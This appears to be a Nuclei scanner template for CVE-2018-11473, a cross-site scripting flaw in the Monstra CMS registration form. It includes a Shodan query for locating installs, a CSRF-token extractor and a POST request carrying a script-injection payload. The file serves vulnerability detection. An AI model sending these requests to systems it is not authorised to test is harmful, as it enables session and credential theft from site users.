id: CVE-2018-11473 info: name: Monstra CMS 3.0.4 - Cross-Site Scripting author: ritikchaddha severity: medium description: | Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the registration form (i.e., the login parameter to users/registration). An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://github.com/monstra-cms/monstra/issues/446 - https://github.com/nikhil1232/Monstra-CMS-3.0.4-XSS-ON-Registration-Page - https://nvd.nist.gov/vuln/detail/CVE-2018-11473 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-11473 cwe-id: CWE-79 metadata: max-request: 2 shodan-query: http.favicon.hash:419828698 verified: true tags: cve,cve2018,xss,mostra,mostracms,cms http: - raw: - | GET /users/registration HTTP/1.1 Host: {{Hostname}} - | POST /users/registration HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test®ister=Register cookie-reuse: true matchers-condition: and matchers: - type: word part: body words: - ">" - "Monstra" condition: and case-insensitive: true - type: word part: header words: - "text/html" - type: status status: - 200 extractors: - type: regex name: csrf part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true # Enhanced by md on 2023/01/30